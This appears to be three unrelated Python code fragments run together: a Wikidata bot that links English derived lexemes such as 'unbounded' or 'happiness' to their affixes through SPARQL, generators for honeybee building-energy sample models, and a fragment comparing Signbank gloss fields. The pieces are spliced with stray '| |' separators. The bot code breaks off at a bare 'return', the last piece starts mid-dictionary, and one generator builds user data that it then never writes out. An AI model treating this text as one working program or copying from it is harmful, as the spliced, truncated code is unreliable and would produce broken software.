# SPDX-License-Identifier: MIT
import argparse
import logging
import pickle
import random
import string
import sys
from datetime import datetime, timezone
from enum import Enum
from pathlib import Path
from random import Random
from typing import Callable, Dict, Optional, Sequence, cast
from wikibaseintegrator import wbi_core, wbi_datatype, wbi_functions
from common import create_login_instance
def random_string(n):
return "".join(random.choices(string.ascii_letters, k=n))
def format_list(items):
"""
>>> format_list(['A', 'B'])
'A and B'
>>> format_list(['A', 'B', 'C'])
'A, B and C'
"""
assert len(items) >= 2
return ", ".join(items[:-1]) + " and " + items[-1]
class Language(Enum):
ENGLISH = "Q1860"
SWEDISH = "Q9027"
class LexicalCategory(Enum):
ADJ = "Q34698"
NOUN = "Q1084"
VERB = "Q24905"
ADVERB = "Q380057"
class LexemeType(Enum):
VERBAL_NOUN = "Q1350145"
ABSOLUTE_ADJ = "Q332375"
AGENT_NOUN = "Q1787727"
class Lexeme:
def __init__(self, qid, lemma=None, category: Optional[LexicalCategory] = None):
self.qid = qid.removeprefix("http://www.wikidata.org/entity/")
self.lemma = lemma
self.category = category
def __str__(self):
return f"Lexeme({self.qid}, {self.lemma}, {self.category})"
HistoryDict = Dict[str, tuple[datetime, bool]]
class History:
"""
Stores information about previously processed lexemes:
- Successfully matched lexemes are skipped forever. This way errors can be
corrected by humans and the bot won't try to reinsert incorrect
information.
- Unmatched lexemes will be processed again after some time to see if
matching works this time. This reduces repeated queries.
"""
def __init__(self, filename: str):
history_dir = Path("history")
history_dir.mkdir(exist_ok=True)
self.path = history_dir / filename
try:
with self.path.open("rb") as f:
self.items: HistoryDict = pickle.load(f)
except FileNotFoundError:
self.items = {}
# Store changes separately and only in the end commit these to the
# history. This way multiple tasks may try to match the same lexeme.
self.changes: HistoryDict = {}
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
items = {**self.items, **self.changes}
with self.path.open("wb") as f:
pickle.dump(items, f)
def add(self, lexeme: Lexeme, matched: bool, now: datetime = None):
if now is None:
now = datetime.now(timezone.utc)
# Commit matched lexeme right away to the history, so that we don't try
# to match them more than once.
if matched:
self.items[lexeme.qid] = (now, matched)
else:
self.changes[lexeme.qid] = (now, matched)
def __contains__(self, lexeme) -> bool:
if lexeme.qid not in self.items:
return False
last_checked, matched = self.items[lexeme.qid]
if matched:
return True
now = datetime.now(timezone.utc)
r = Random(f"{lexeme.qid} {last_checked}")
return (now - last_checked).days < r.randint(14, 28)
class Result:
def __init__(
self,
lexeme: Lexeme,
parts: Sequence[Optional[Lexeme]],
types: Sequence[LexemeType] = None,
):
self.lexeme = lexeme
self.parts = parts
self.types = types if types is not None else []
class Task:
def __init__(
self,
language: Language,
categories: Sequence[LexicalCategory],
transform: Callable[[str], Result],
include=None,
exclude=None,
name=None,
):
self.language = language
self.categories = categories
self.transform = transform
self.include = include
self.exclude = exclude
self.name = name
def _search_lexemes(self, limit: int):
query = "SELECT ?lexeme ?lemma ?category WHERE {\n"
query += f" ?lexeme dct:language wd:{self.language.value};\n"
query += f" wikibase:lexicalCategory ?category;\n"
query += " wikibase:lemma ?lemma.\n"
query += (
" FILTER(?category IN ("
+ ",".join(f"wd:{category.value}" for category in self.categories)
+ "))\n"
)
if self.include:
query += f' FILTER(REGEX(?lemma, "{self.include}"))\n'
if self.exclude:
query += f' FILTER(!REGEX(?lemma, "{self.exclude}"))\n'
# Ignore lexemes with existing combines (P5238) claims. These might be
# previously added by this bot or humans.
query += " MINUS { ?lexeme wdt:P5238 []. }\n"
# Randomize rows using custom randomization instead of RAND function.
# This will make it sure that the order is really random and embedding
# a random string to the query will bypass any caching. For more
# information, see https://byabbe.se/2020/09/17/getting-random-results-in-sparql
random = random_string(10)
query += f' BIND(SHA512(CONCAT("{random}", STR(?lexeme))) AS ?random)\n'
query += "}\n"
query += f"ORDER BY ?random\n"
# Query extra lexemes to fill the limit because some lexemes may be
# skipped later if no matching lexeme is found.
query += f"LIMIT {10*limit}"
data = wbi_functions.execute_sparql_query(query)
lexemes = []
for row in data["results"]["bindings"]:
lexemes.append(
Lexeme(
row["lexeme"]["value"],
row["lemma"]["value"],
LexicalCategory(
row["category"]["value"].removeprefix(
"http://www.wikidata.org/entity/"
)
),
)
)
return lexemes
def execute(self, limit: int, history: History):
i = 0
for lexeme in self._search_lexemes(limit):
if i == limit:
break
if lexeme in history:
continue
result = self.transform(lexeme)
if result.parts and all(result.parts):
yield result
i += 1
history.add(lexeme, matched=True)
else:
history.add(lexeme, matched=False)
tasks = []
def task(**kwargs):
def inner(fn):
tasks.append(Task(name=fn.__name__, **kwargs, transform=fn))
return inner
def find_lexeme(
lemma: str, language: Language, categories: list[LexicalCategory]
) -> Optional[Lexeme]:
"""Search a single lexeme with the specified lemma."""
cats = ", ".join(f"wd:{cat.value}" for cat in categories)
query = "SELECT ?lexeme ?category WHERE {\n"
query += f" ?lexeme dct:language wd:{language.value};\n"
query += f" wikibase:lexicalCategory ?category;\n"
query += " wikibase:lemma ?lemma.\n"
query += f' FILTER(?category IN ({cats}) && STR(?lemma) = "{lemma}")\n'
query += "}\n"
query += "LIMIT 2"
data = wbi_functions.execute_sparql_query(query)
results = data["results"]["bindings"]
# To play it safe, let's continue only if we found a single lexeme.
if len(results) != 1:
return None
qid = results[0]["lexeme"]["value"]
category = LexicalCategory(
results[0]["category"]["value"].removeprefix("http://www.wikidata.org/entity/")
)
return Lexeme(qid, lemma, category)
# "unbounded" → "un-" + "bounded"
# "underived" → "un-" + "derived"
@task(
language=Language.ENGLISH,
categories=[LexicalCategory.ADJ],
include="^un...",
)
def en_un_adj(lexeme: Lexeme) -> Result:
parts = [
Lexeme("L15649", "un-"),
find_lexeme(
lemma=lexeme.lemma.removeprefix("un"),
language=Language.ENGLISH,
categories=[LexicalCategory.ADJ],
),
]
return Result(lexeme=lexeme, parts=parts)
# "unbox" → "un-" + "box"
# "underive" → "un-" + "derive"
@task(
language=Language.ENGLISH,
categories=[LexicalCategory.VERB],
include="^un...",
)
def en_un_verb(lexeme: Lexeme) -> Result:
parts = [
Lexeme("L15649", "un-"),
find_lexeme(
lemma=lexeme.lemma.removeprefix("un"),
language=Language.ENGLISH,
categories=[LexicalCategory.VERB],
),
]
return Result(lexeme=lexeme, parts=parts)
# "defuse" → "de-" + "fuse"
@task(
language=Language.ENGLISH,
categories=[LexicalCategory.VERB],
include="^de......",
)
def en_de_verb(lexeme: Lexeme) -> Result:
parts = [
Lexeme("L35199", "de-"),
find_lexeme(
lemma=lexeme.lemma.removeprefix("de"),
language=Language.ENGLISH,
categories=[LexicalCategory.VERB],
),
]
return Result(lexeme=lexeme, parts=parts)
# "disconnect" → "dis-" + "connect"
@task(
language=Language.ENGLISH,
categories=[LexicalCategory.VERB],
include="^dis......",
)
def en_dis_verb(lexeme: Lexeme) -> Result:
parts = [
Lexeme("L29593", "dis-"),
find_lexeme(
lemma=lexeme.lemma.removeprefix("dis"),
language=Language.ENGLISH,
categories=[LexicalCategory.VERB],
),
]
return Result(lexeme=lexeme, parts=parts)
# "misunderstand" → "mis-" + "understand"
@task(
language=Language.ENGLISH,
categories=[LexicalCategory.VERB],
include="^mis......",
)
def en_mis_verb(lexeme: Lexeme) -> Result:
parts = [
Lexeme("L613650", "mis-"),
find_lexeme(
lemma=lexeme.lemma.removeprefix("mis"),
language=Language.ENGLISH,
categories=[LexicalCategory.VERB],
),
]
return Result(lexeme=lexeme, parts=parts)
# "antioxidant" → "anti-" + "oxidant"
# "anticlimactic" → "anti-" + "climactic"
@task(
language=Language.ENGLISH,
categories=[LexicalCategory.NOUN, LexicalCategory.ADJ],
include="^anti-?......",
)
def en_anti(lexeme: Lexeme) -> Result:
assert lexeme.category is not None
parts = [
Lexeme("L29591", "anti-"),
find_lexeme(
lemma=lexeme.lemma.removeprefix("anti").removeprefix("-"),
language=Language.ENGLISH,
categories=[lexeme.category],
),
]
return Result(lexeme=lexeme, parts=parts)
# "counterculture" → "counter-" + "culture"
# "counterclockwise" → "counter-" + "clockwise"
@task(
language=Language.ENGLISH,
categories=[LexicalCategory.NOUN, LexicalCategory.ADJ],
include="^counter-?......",
)
def en_counter(lexeme: Lexeme) -> Result:
assert lexeme.category is not None
parts = [
Lexeme("L36419", "counter-"),
find_lexeme(
lemma=lexeme.lemma.removeprefix("counter").removeprefix("-"),
language=Language.ENGLISH,
categories=[lexeme.category],
),
]
return Result(lexeme=lexeme, parts=parts)
# "contradistinction" → "contra-" + "distinction"
# "contralateral" → "contra-" + "lateral"
@task(
language=Language.ENGLISH,
categories=[LexicalCategory.NOUN, LexicalCategory.ADJ],
include="^contra-?......",
)
def en_contra(lexeme: Lexeme) -> Result:
assert lexeme.category is not None
parts = [
Lexeme("L36418", "contra-"),
find_lexeme(
lemma=lexeme.lemma.removeprefix("contra").removeprefix("-"),
language=Language.ENGLISH,
categories=[lexeme.category],
),
]
return Result(lexeme=lexeme, parts=parts)
# "protohistory" → "proto-" + "history"
# "protoacademic" → "proto-" + "academic"
@task(
language=Language.ENGLISH,
categories=[LexicalCategory.NOUN, LexicalCategory.ADJ],
include="^proto-?......",
)
def en_proto(lexeme: Lexeme) -> Result:
assert lexeme.category is not None
parts = [
Lexeme("L615092", "proto-"),
find_lexeme(
lemma=lexeme.lemma.removeprefix("proto").removeprefix("-"),
language=Language.ENGLISH,
categories=[lexeme.category],
),
]
return Result(lexeme=lexeme, parts=parts)
# "overlook" → "over-" + "look"
# "overkind" → "over-" + "kind"
# "overlord" → "over-" + "lord"
@task(
language=Language.ENGLISH,
categories=[LexicalCategory.VERB, LexicalCategory.ADJ, LexicalCategory.NOUN],
include="^over-?...",
)
def en_over(lexeme: Lexeme) -> Result:
assert lexeme.category is not None
parts = [
Lexeme("L618499", "over-"),
find_lexeme(
lemma=lexeme.lemma.removeprefix("over").removeprefix("-"),
language=Language.ENGLISH,
categories=[lexeme.category],
),
]
return Result(lexeme=lexeme, parts=parts)
# "restless" → "rest" + "-less"
@task(language=Language.ENGLISH, categories=[LexicalCategory.ADJ], include="...less$")
def en_less(lexeme: Lexeme) -> Result:
parts = [
find_lexeme(
lemma=lexeme.lemma.removesuffix("less"),
language=Language.ENGLISH,
categories=[LexicalCategory.NOUN],
),
Lexeme("L303186", "-less"),
]
return Result(lexeme=lexeme, parts=parts)
# "awkwardness" → "awkward" + "-ness"
# "happiness" → "happy" + "-ness"
@task(language=Language.ENGLISH, categories=[LexicalCategory.NOUN], include="...ness$")
def en_ness(lexeme: Lexeme) -> Result:
lemma = lexeme.lemma.removesuffix("ness")
if lemma[-1] == "i":
lemma = lemma[:-1] + "y"
parts = [
find_lexeme(
lemma=lemma,
language=Language.ENGLISH,
categories=[LexicalCategory.ADJ],
),
Lexeme("L269834", "-ness"),
]
return Result(lexeme=lexeme, parts=parts)
# "guitarist" → "guitar" + "-ist"
# "surrealist" → "surreal" + "-ist"
@task(language=Language.ENGLISH, categories=[LexicalCategory.NOUN], include="...ist$")
def en_ist(lexeme: Lexeme) -> Result:
parts = [
find_lexeme(
lemma=lexeme.lemma.removesuffix("ist"),
language=Language.ENGLISH,
categories=[LexicalCategory.NOUN, LexicalCategory.ADJ],
),
Lexeme("L29847", "-ist"),
]
return Result(lexeme=lexeme, parts=parts, types=[LexemeType.AGENT_NOUN])
# "alcoholism" → "alcohol" + "-ism"
# "surrealism" → "surreal" + "-ism"
@task(language=Language.ENGLISH, categories=[LexicalCategory.NOUN], include="...ism$")
def en_ism(lexeme: Lexeme) -> Result:
parts = [
find_lexeme(
lemma=lexeme.lemma.removesuffix("ism"),
language=Language.ENGLISH,
categories=[LexicalCategory.NOUN, LexicalCategory.ADJ],
),
Lexeme("L29596", "-ism"),
]
return Result(lexeme=lexeme, parts=parts)
# "peaceful" → "peace" + "-ful"
# "beautiful" → "beauty" + "-ful"
@task(language=Language.ENGLISH, categories=[LexicalCategory.ADJ], include="...ful$")
def en_ful_adj(lexeme: Lexeme) -> Result:
lemma = lexeme.lemma.removesuffix("ful")
if lemma[-1] == "i":
lemma = lemma[:-1] + "y"
parts = [
find_lexeme(
lemma=lemma,
language=Language.ENGLISH,
categories=[LexicalCategory.NOUN],
),
Lexeme("L7893", "-ful"),
]
return Result(lexeme=lexeme, parts=parts)
# "handful" → "hand" + "-ful"
@task(language=Language.ENGLISH, categories=[LexicalCategory.NOUN], include="...ful$")
def en_ful_noun(lexeme: Lexeme) -> Result:
parts = [
find_lexeme(
lemma=lexeme.lemma.removesuffix("ful"),
language=Language.ENGLISH,
categories=[LexicalCategory.NOUN],
),
Lexeme("L592127", "-ful"),
]
return | |
# coding=utf-8
from honeybee.model import Model
from honeybee.room import Room
from honeybee.face import Face
from honeybee.shade import Shade
from honeybee.aperture import Aperture
from honeybee.door import Door
from honeybee.boundarycondition import boundary_conditions
from honeybee.facetype import face_types, Floor, RoofCeiling
from honeybee_energy.constructionset import ConstructionSet
from honeybee_energy.construction.opaque import OpaqueConstruction
from honeybee_energy.construction.window import WindowConstruction
from honeybee_energy.construction.shade import ShadeConstruction
from honeybee_energy.material.opaque import EnergyMaterial
from honeybee_energy.schedule.fixedinterval import ScheduleFixedInterval
from honeybee_energy.schedule.ruleset import ScheduleRuleset
from honeybee_energy.load.setpoint import Setpoint
from honeybee_energy.ventcool.opening import VentilationOpening
from honeybee_energy.ventcool.control import VentilationControl
from honeybee_energy.ventcool import afn
from honeybee_energy.ventcool.simulation import VentilationSimulationControl
from honeybee_energy.hvac.allair.vav import VAV
from honeybee_energy.hvac.doas.fcu import FCUwithDOAS
from honeybee_energy.hvac.heatcool.windowac import WindowAC
import honeybee_energy.lib.programtypes as prog_type_lib
import honeybee_energy.lib.scheduletypelimits as schedule_types
from honeybee_energy.lib.materials import clear_glass, air_gap, roof_membrane, \
wood, insulation
from honeybee_energy.lib.constructions import generic_exterior_wall, \
generic_interior_wall, generic_interior_floor, generic_interior_ceiling, \
generic_double_pane
from honeybee_radiance.modifierset import ModifierSet
from honeybee_radiance.modifier.material import Glass, Plastic, Trans
from honeybee_radiance.dynamic import RadianceShadeState, RadianceSubFaceState, \
StateGeometry
from ladybug_geometry.geometry3d.pointvector import Point3D, Vector3D
from ladybug_geometry.geometry3d.plane import Plane
from ladybug_geometry.geometry3d.face import Face3D
from ladybug_geometry.geometry3d.polyface import Polyface3D
import os
import json
import random
def model_complete_single_zone_office(directory):
room = Room.from_box('Tiny_House_Office', 5, 10, 3)
room.properties.energy.program_type = prog_type_lib.office_program
room.properties.energy.add_default_ideal_air()
stone = EnergyMaterial('Thick Stone', 0.3, 2.31, 2322, 832, 'Rough',
0.95, 0.75, 0.8)
thermal_mass_constr = OpaqueConstruction('Thermal Mass Floor', [stone])
room[0].properties.energy.construction = thermal_mass_constr
south_face = room[3]
south_face.apertures_by_ratio(0.4, 0.01)
south_face.apertures[0].overhang(0.5, indoor=False)
south_face.apertures[0].overhang(0.5, indoor=True)
south_face.move_shades(Vector3D(0, 0, -0.5))
light_shelf_out = ShadeConstruction('Outdoor_Light_Shelf', 0.5, 0.5)
light_shelf_in = ShadeConstruction('Indoor_Light_Shelf', 0.7, 0.7)
south_face.apertures[0].outdoor_shades[0].properties.energy.construction = light_shelf_out
south_face.apertures[0].indoor_shades[0].properties.energy.construction = light_shelf_in
north_face = room[1]
north_face.overhang(0.25, indoor=False)
door_verts = [Point3D(2, 10, 0.1), Point3D(1, 10, 0.1),
Point3D(1, 10, 2.5), Point3D(2, 10, 2.5)]
door = Door('Front_Door', Face3D(door_verts))
north_face.add_door(door)
aperture_verts = [Point3D(4.5, 10, 1), Point3D(2.5, 10, 1),
Point3D(2.5, 10, 2.5), Point3D(4.5, 10, 2.5)]
aperture = Aperture('Front_Aperture', Face3D(aperture_verts))
triple_pane = WindowConstruction(
'Triple Pane Window', [clear_glass, air_gap, clear_glass, air_gap, clear_glass])
aperture.properties.energy.construction = triple_pane
north_face.add_aperture(aperture)
tree_canopy_geo = Face3D.from_regular_polygon(
6, 2, Plane(Vector3D(0, 0, 1), Point3D(5, -3, 4)))
tree_canopy = Shade('Tree_Canopy', tree_canopy_geo)
table_geo = Face3D.from_rectangle(2, 2, Plane(o=Point3D(1.5, 4, 1)))
table = Shade('Table', table_geo)
room.add_indoor_shade(table)
model = Model('Tiny_House', [room], orphaned_shades=[tree_canopy])
dest_file = os.path.join(directory, 'model_complete_single_zone_office.json')
with open(dest_file, 'w') as fp:
json.dump(model.to_dict(), fp, indent=4)
def model_complete_single_zone_office_user_data(directory):
room = Room.from_box('Tiny_House_Office', 5, 10, 3)
room.properties.energy.program_type = prog_type_lib.office_program
room.properties.energy.add_default_ideal_air()
south_face = room[3]
south_face.apertures_by_ratio(0.4, 0.01)
south_face.apertures[0].overhang(0.5, indoor=False)
south_face.apertures[0].overhang(0.5, indoor=True)
south_face.move_shades(Vector3D(0, 0, -0.5))
light_shelf_out = ShadeConstruction('Outdoor_Light_Shelf', 0.5, 0.5)
light_shelf_in = ShadeConstruction('Indoor_Light_Shelf', 0.7, 0.7)
south_face.apertures[0].outdoor_shades[0].properties.energy.construction = light_shelf_out
south_face.apertures[0].indoor_shades[0].properties.energy.construction = light_shelf_in
north_face = room[1]
north_face.overhang(0.25, indoor=False)
door_verts = [Point3D(2, 10, 0.1), Point3D(1, 10, 0.1),
Point3D(1, 10, 2.5), Point3D(2, 10, 2.5)]
door = Door('Front_Door', Face3D(door_verts))
north_face.add_door(door)
aperture_verts = [Point3D(4.5, 10, 1), Point3D(2.5, 10, 1),
Point3D(2.5, 10, 2.5), Point3D(4.5, 10, 2.5)]
aperture = Aperture('Front_Aperture', Face3D(aperture_verts))
north_face.add_aperture(aperture)
model = Model('Tiny_House', [room])
model_dict = model.to_dict()
model_dict['user_data'] = {'site': 'The backyard'}
model_dict['rooms'][0]['user_data'] = {'alt_name': 'Little old tiny house'}
model_dict['rooms'][0]['faces'][0]['user_data'] = {'alt_name': 'The floor'}
model_dict['rooms'][0]['faces'][3]['apertures'][0]['user_data'] = \
{'alt_name': 'Picture window'}
model_dict['rooms'][0]['faces'][1]['doors'][0]['user_data'] = \
{'alt_name': 'Front door'}
model_dict['rooms'][0]['faces'][3]['apertures'][0]['outdoor_shades'][0]['user_data'] = \
{'alt_name': 'Awning'}
dest_file = os.path.join(directory, 'model_complete_user_data.json')
with open(dest_file, 'w') as fp:
json.dump(model.to_dict(), fp, indent=4)
def model_complete_multi_zone_office(directory):
first_floor = Room.from_box('First_Floor', 10, 10, 3, origin=Point3D(0, 0, 0))
second_floor = Room.from_box('Second_Floor', 10, 10, 3, origin=Point3D(0, 0, 3))
first_floor.properties.energy.program_type = prog_type_lib.office_program
second_floor.properties.energy.program_type = prog_type_lib.office_program
first_floor.properties.energy.add_default_ideal_air()
second_floor.properties.energy.add_default_ideal_air()
for face in first_floor[1:5]:
face.apertures_by_ratio(0.2, 0.01)
for face in second_floor[1:5]:
face.apertures_by_ratio(0.2, 0.01)
pts_1 = [Point3D(0, 0, 6), Point3D(0, 10, 6), Point3D(10, 10, 6), Point3D(10, 0, 6)]
pts_2 = [Point3D(0, 0, 6), Point3D(5, 0, 9), Point3D(5, 10, 9), Point3D(0, 10, 6)]
pts_3 = [Point3D(10, 0, 6), Point3D(10, 10, 6), Point3D(5, 10, 9), Point3D(5, 0, 9)]
pts_4 = [Point3D(0, 0, 6), Point3D(10, 0, 6), Point3D(5, 0, 9)]
pts_5 = [Point3D(10, 10, 6), Point3D(0, 10, 6), Point3D(5, 10, 9)]
face_1 = Face('AtticFace1', Face3D(pts_1))
face_2 = Face('AtticFace2', Face3D(pts_2))
face_3 = Face('AtticFace3', Face3D(pts_3))
face_4 = Face('AtticFace4', Face3D(pts_4))
face_5 = Face('AtticFace5', Face3D(pts_5))
attic = Room('Attic', [face_1, face_2, face_3, face_4, face_5], 0.01, 1)
constr_set = ConstructionSet('Attic Construction Set')
polyiso = EnergyMaterial('PolyIso', 0.2, 0.03, 43, 1210, 'MediumRough')
roof_constr = OpaqueConstruction('Attic Roof Construction',
[roof_membrane, polyiso, wood])
floor_constr = OpaqueConstruction('Attic Floor Construction',
[wood, insulation, wood])
constr_set.floor_set.interior_construction = floor_constr
constr_set.roof_ceiling_set.exterior_construction = roof_constr
attic.properties.energy.construction_set = constr_set
Room.solve_adjacency([first_floor, second_floor, attic], 0.01)
model = Model('Multi_Zone_Single_Family_House', [first_floor, second_floor, attic])
dest_file = os.path.join(directory, 'model_complete_multi_zone_office.json')
with open(dest_file, 'w') as fp:
json.dump(model.to_dict(), fp, indent=4)
def model_complete_patient_room(directory):
pat_room_program = \
prog_type_lib.program_type_by_identifier('2013::Hospital::ICU_PatRm')
room = Room.from_box('Hospital_Patient_Room', 5, 10, 3)
room.properties.energy.program_type = pat_room_program
room.properties.energy.add_default_ideal_air()
ideal_air = room.properties.energy.hvac.duplicate()
ideal_air.economizer_type = 'DifferentialEnthalpy'
ideal_air.sensible_heat_recovery = 0.81
ideal_air.latent_heat_recovery = 0.68
room.properties.energy.hvac = ideal_air
pat_rm_setpoint = room.properties.energy.setpoint.duplicate()
pat_rm_setpoint.identifier = 'Humidity Controlled PatRm Setpt'
pat_rm_setpoint.heating_setpoint = 21
pat_rm_setpoint.cooling_setpoint = 24
pat_rm_setpoint.humidifying_setpoint = 30
pat_rm_setpoint.dehumidifying_setpoint = 55
room.properties.energy.setpoint = pat_rm_setpoint
south_face = room[3]
south_face.apertures_by_ratio(0.4, 0.01)
south_face.apertures[0].overhang(0.5, indoor=False)
south_face.move_shades(Vector3D(0, 0, -0.5))
room[0].boundary_condition = boundary_conditions.adiabatic
room[1].boundary_condition = boundary_conditions.adiabatic
room[2].boundary_condition = boundary_conditions.adiabatic
room[4].boundary_condition = boundary_conditions.adiabatic
room[5].boundary_condition = boundary_conditions.adiabatic
model = Model('Patient_Room_Test_Box', [room])
dest_file = os.path.join(directory, 'model_complete_patient_room.json')
with open(dest_file, 'w') as fp:
json.dump(model.to_dict(), fp, indent=4)
def model_complete_office_floor(directory):
pts_1 = [Point3D(0, 0), Point3D(30, 0), Point3D(20, 10), Point3D(10, 10)]
pts_2 = [Point3D(0, 0), Point3D(10, 10), Point3D(10, 20), Point3D(0, 30)]
pts_3 = [Point3D(10, 20), Point3D(20, 20), Point3D(30, 30), Point3D(0, 30)]
pts_4 = [Point3D(30, 0), Point3D(30, 30), Point3D(20, 20), Point3D(20, 10)]
verts = [pts_1, pts_2, pts_3, pts_4]
rooms = []
for i, f_vert in enumerate(verts):
pface = Polyface3D.from_offset_face(Face3D(f_vert), 3)
room = Room.from_polyface3d('PerimeterRoom{}'.format(i), pface)
room.properties.energy.program_type = prog_type_lib.office_program
room.properties.energy.add_default_ideal_air()
rooms.append(room)
rooms.append(Room.from_box('CoreRoom', 10, 10, 3, origin=Point3D(10, 10)))
adj_info = Room.solve_adjacency(rooms, 0.01)
for face_pair in adj_info['adjacent_faces']:
face_pair[0].type = face_types.air_boundary
face_pair[1].type = face_types.air_boundary
for room in rooms:
for face in room:
if isinstance(face.type, (Floor, RoofCeiling)):
face.boundary_condition = boundary_conditions.adiabatic
model = Model('Core_Perimeter_Office_Floor', rooms)
dest_file = os.path.join(directory, 'model_complete_office_floor.json')
with open(dest_file, 'w') as fp:
json.dump(model.to_dict(), fp, indent=4)
def model_complete_holes(directory):
bound_pts = [Point3D(0, 0), Point3D(9, 0), Point3D(9, 9), Point3D(0, 9)]
hole_pts = [Point3D(3, 3, 0), Point3D(6, 3, 0), Point3D(6, 6, 0), Point3D(3, 6, 0)]
face = Face3D(bound_pts, None, [hole_pts])
polyface = Polyface3D.from_offset_face(face, 3)
room = Room.from_polyface3d('DonutZone', polyface)
ap_bound_pts = [Point3D(0.5, 0, 0.5), Point3D(2.5, 0, 0.5), Point3D(2.5, 0, 2.5),
Point3D(0.5, 0, 2.5)]
ap_hole_pts = [Point3D(1, 0, 1), Point3D(2, 0, 1), Point3D(2, 0, 2), Point3D(1, 0, 2)]
ap_face = Face3D(ap_bound_pts, None, [ap_hole_pts])
ap = Aperture('HoleAperture', ap_face)
for face in room.faces:
if face.geometry.is_sub_face(ap_face, 0.01, 1.0):
face.add_aperture(ap)
shd_bound_pts = [Point3D(0, 0, 6), Point3D(9, 0, 6), Point3D(9, 9, 6), Point3D(0, 9, 6)]
shd_hole_pts1 = [Point3D(2, 2, 6), Point3D(4, 2, 6), Point3D(4, 4, 6), Point3D(2, 4, 6)]
shd_hole_pts2 = [Point3D(5, 5, 6), Point3D(7, 5, 6), Point3D(7, 7, 6), Point3D(5, 7, 6)]
s_face = Face3D(shd_bound_pts, None, [shd_hole_pts1, shd_hole_pts2])
shd = Shade('Canopy', s_face)
model = Model('Donut_Building', [room], orphaned_shades=[shd])
dest_file = os.path.join(directory, 'model_complete_holes.json')
with open(dest_file, 'w') as fp:
json.dump(model.to_dict(), fp, indent=4)
def model_energy_shoe_box(directory):
room = Room.from_box('Simple_Shoe_Box_Zone', 5, 10, 3)
room[0].boundary_condition = boundary_conditions.adiabatic
for face in room[2:]:
face.boundary_condition = boundary_conditions.adiabatic
north_face = room[1]
north_face.apertures_by_ratio_rectangle(0.4, 2, 0.7, 2, 0, 0.01)
constr_set = ConstructionSet('Shoe Box Construction Set')
constr_set.wall_set.exterior_construction = generic_exterior_wall
constr_set.wall_set.interior_construction = generic_interior_wall
constr_set.floor_set.interior_construction = generic_interior_floor
constr_set.roof_ceiling_set.interior_construction = generic_interior_ceiling
constr_set.aperture_set.window_construction = generic_double_pane
room.properties.energy.construction_set = constr_set
model = Model('Shoe_Box', [room])
dest_file = os.path.join(directory, 'model_energy_shoe_box.json')
with open(dest_file, 'w') as fp:
json.dump(model.to_dict(included_prop=['energy']), fp, indent=4)
def model_energy_detailed_loads(directory):
room = Room.from_box('Office_Test_Box', 5, 10, 3)
room.properties.energy.program_type = prog_type_lib.plenum_program
room.properties.energy.add_default_ideal_air()
room.properties.energy.people = prog_type_lib.office_program.people
room.properties.energy.lighting = prog_type_lib.office_program.lighting
room.properties.energy.electric_equipment = prog_type_lib.office_program.electric_equipment
room.properties.energy.infiltration = prog_type_lib.office_program.infiltration
room.properties.energy.ventilation = prog_type_lib.office_program.ventilation
room.properties.energy.setpoint = prog_type_lib.office_program.setpoint
room[0].boundary_condition = boundary_conditions.adiabatic
room[1].boundary_condition = boundary_conditions.adiabatic
room[2].boundary_condition = boundary_conditions.adiabatic
room[4].boundary_condition = boundary_conditions.adiabatic
room[5].boundary_condition = boundary_conditions.adiabatic
model = Model('Office_Model', [room])
dest_file = os.path.join(
directory, 'model_energy_detailed_loads.json')
with open(dest_file, 'w') as fp:
json.dump(model.to_dict(included_prop=['energy']), fp, indent=4)
def model_energy_fixed_interval(directory):
room = Room.from_box('Tiny_House_Office', 5, 10, 3)
room.properties.energy.program_type = prog_type_lib.office_program
room.properties.energy.add_default_ideal_air()
occ_sched = ScheduleFixedInterval(
'Random Occupancy', [round(random.random(), 4) for i in range(8760)],
schedule_types.fractional)
new_people = room.properties.energy.people.duplicate()
new_people.occupancy_schedule = occ_sched
room.properties.energy.people = new_people
south_face = room[3]
south_face.apertures_by_ratio(0.4, 0.01)
south_face.apertures[0].overhang(0.5, indoor=False)
south_face.apertures[0].overhang(0.5, indoor=True)
south_face.move_shades(Vector3D(0, 0, -0.5))
light_shelf_out = ShadeConstruction('Outdoor_Light_Shelf', 0.5, 0.5)
light_shelf_in = ShadeConstruction('Indoor_Light_Shelf', 0.7, 0.7)
south_face.apertures[0].outdoor_shades[0].properties.energy.construction = light_shelf_out
south_face.apertures[0].indoor_shades[0].properties.energy.construction = light_shelf_in
north_face = room[1]
north_face.overhang(0.25, indoor=False)
door_verts = [Point3D(2, 10, 0.1), Point3D(1, 10, 0.1),
Point3D(1, 10, 2.5), Point3D(2, 10, 2.5)]
door = Door('Front_Door', Face3D(door_verts))
north_face.add_door(door)
aperture_verts = [Point3D(4.5, 10, 1), Point3D(2.5, 10, 1),
Point3D(2.5, 10, 2.5), Point3D(4.5, 10, 2.5)]
aperture = Aperture('Front_Aperture', Face3D(aperture_verts))
north_face.add_aperture(aperture)
tree_canopy_geo = Face3D.from_regular_polygon(
6, 2, Plane(Vector3D(0, 0, 1), Point3D(5, -3, 4)))
tree_canopy = Shade('Tree_Canopy', tree_canopy_geo)
winter = [0.75] * 2190
spring = [0.75 - ((x / 2190) * 0.5) for x in range(2190)]
summer = [0.25] * 2190
fall = [0.25 + ((x / 2190) * 0.5) for x in range(2190)]
trans_sched = ScheduleFixedInterval(
'Seasonal Tree Transmittance', winter + spring + summer + fall,
schedule_types.fractional)
tree_canopy.properties.energy.transmittance_schedule = trans_sched
| |
'dataset': current_dataset,
'annotationidglosstranslation':default_annotationidglosstranslation,
'machine_key': human_key,
'human_key': human_key,
'original_machine_value': tag_names_display,
'original_human_value': tag_names_display,
'new_machine_value': new_tag_names_display,
'new_human_value': new_tag_names_display})
continue
elif human_key == 'Notes':
if new_human_value == 'None' or new_human_value == '':
continue
sorted_notes_display = get_notes_as_string(gloss)
(sorted_new_notes_display, new_note_errors, note_type_error, note_tuple_error) = \
check_existence_notes(gloss, new_human_value, note_type_error, note_tuple_error, default_annotationidglosstranslation)
if len(new_note_errors):
errors_found += new_note_errors
elif sorted_notes_display != sorted_new_notes_display:
differences.append({'pk': gloss_id,
'dataset': current_dataset,
'annotationidglosstranslation':default_annotationidglosstranslation,
'machine_key': human_key,
'human_key': human_key,
'original_machine_value': sorted_notes_display,
'original_human_value': sorted_notes_display,
'new_machine_value': sorted_new_notes_display,
'new_human_value': sorted_new_notes_display})
continue
#If not, find the matching field in the gloss, and remember its 'real' name
try:
field = fields[human_key]
machine_key = field.name
# print('SUCCESS: accessing field name: (', human_key, ')')
except KeyError:
# print('field ', human_key, ' not found in fields')
# Signbank ID is skipped, for this purpose it was popped from the fields to compare
